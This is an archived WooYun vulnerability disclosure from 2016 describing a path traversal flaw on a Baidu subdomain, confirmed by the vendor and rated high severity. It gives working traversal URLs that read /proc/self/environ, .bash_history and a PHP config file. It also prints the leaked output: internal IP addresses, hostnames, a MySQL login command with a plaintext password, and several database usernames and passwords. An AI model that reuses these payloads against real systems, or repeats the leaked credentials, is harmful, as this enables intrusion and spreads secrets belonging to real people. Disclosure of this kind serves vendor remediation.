乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-29: 细节已通知厂商并且等待厂商处理中 2016-03-29: 厂商已经确认,细节仅向厂商公开 2016-04-08: 细节向核心白帽子及相关领域专家公开 2016-04-18: 细节向普通白帽子公开 2016-04-28: 细节向实习白帽子公开 2016-05-13: 细节向公众公开
百度某站点任意文件遍历(泄漏数据库帐号密码等)
http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/sysconfig/network-scripts/ifcfg-eth1
可以读取任意本地文件。
DEVICE=eth1BOOTPROTO=staticIPADDR=10.26.186.23NETMASK=255.255.255.0ONBOOT=yes
得到IP地址是10.26.186.23。再读取/proc/self/environ:
MANPATH=:/usr/share/baidu/manHOSTNAME=tc-dev-light01.tc.baidu.comTERM=linuxSHELL=/bin/bashHISTSIZE=1000SSH_CLIENT=10.48.50.43 43745 22SSH_TTY=/dev/pts/0USER=workLD_LIBRARY_PATH=/home/op/opbin/optool/lib:LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:SUDO_USER=zhaojianqiSUDO_UID=194560OPHOME=/home/opOPTOOL=/home/op/opbin/optoolMAIL=/var/spool/mail/zhaojianqiPATH=/home/op/opbin/optool/bin:/home/op/opbin/optool/bin:/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/share/baidu/bin:/opt/bin:/home/opt/bin:/DoorGod/bin:/opt/bin:/home/opt/binPWD=/home/work/php/sbinINPUTRC=/etc/inputrcEDITOR=vimLANG=en_USSUDO_COMMAND=/bin/bashSHLVL=5HOME=/home/workLOGNAME=workSSH_CONNECTION=10.48.50.43 43745 10.26.186.13 22LESSOPEN=|/usr/bin/lesspipe.sh %sPKG_CONFIG_PATH=/home/op/opbin/optool/lib/pkgconfig:/home/op/opbin/optool/lib/pkgconfig:SUDO_GID=100000G_BROKEN_FILENAMES=1_=/home/work/php/bin/php-cgiFPM_SOCKETS=/home/work/php/tmp/php-fpm.sock
得到主机名: HOSTNAME=tc-dev-light01.tc.baidu.com。.bash_history文件是存在的:
http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/.bash_history
历史命令泄漏了MySQL密码:
/home/work/mysql/bin/mysql -hsh01-dba-chunlei-lapp-01.sh01 -P5100 -pGOGZ7Wpr8wrjHS6g -Dlightpay -ulightpay_r --default-character-set=utf8
源代码中还泄漏了数据库配置信息,有较多的数据库密码:
http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/phpui/conf/bdDBProxyConfig.class.php /** * DBProxy集群的机器列表、访问集群时所用的用户名、密码、端口号、失败重试次数 * @var array */ static $arrDBProxyServer = array( self::DBPROXY_OPENPLATFORM_INDEX => array( //open-platform dbproxy集群 'username' => 'developer_w', 'password' => 'v60KOStx8cMQrv60', 'port' => 6014, 'jx' => array( '10.46.7.20', '10.46.7.20', ), 'tc' => array( '10.42.8.18', '10.42.8.18', ), ), self::DBPROXY_OPENPLATFORM_READONLY_INDEX => array( //open-platform dbproxy集群 'username' => 'openplatform_r', 'password' => 'oY3DHhmW1BFfkUYy', 'port' => 5352, 'jx' => array( '10.202.95.49', ), 'tc' => array( '10.202.95.49', ), ),其余省略
正确处理path
危害等级:高
漏洞Rank:15
确认时间:2016-03-29 19:53
感谢对百度安全的关注
暂无